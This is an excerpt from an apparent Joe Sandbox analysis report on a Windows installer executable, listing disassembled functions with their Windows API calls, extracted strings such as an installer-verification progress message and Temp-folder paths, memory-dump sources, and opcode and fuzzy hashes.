                                                          • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                          Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                          • MulDiv.KERNEL32(000F45F7,00000064,000F47FB), ref: 00402E20
                                                          • wsprintfW.USER32 ref: 00402E30
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                          • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                          • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                          • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                          Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 1000256D
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                          Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                          • GlobalFree.KERNEL32(?), ref: 00402950
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                          • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                          • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                          • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                          Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqA869.tmp$C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll
                                                          • API String ID: 3109718747-3005640722
                                                          • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                          • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                          • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                          • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                          Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                          • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                          Function 00401DB3 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DB6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                          • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                          • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                          • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                          • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                          • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                          • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                          Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                          • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                          • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                          • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                          Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                          • wsprintfW.USER32 ref: 00404B4C
                                                          • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                          • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                          • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                          • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                          Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3081826266
                                                          • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                          • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                          • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                          Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                          • GetTickCount.KERNEL32 ref: 00402E8E
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                          • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                          • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                          • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                          Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                          • GlobalFree.KERNEL32(?), ref: 0040391C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3081826266
                                                          • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                          • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                          • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                          • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                          Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
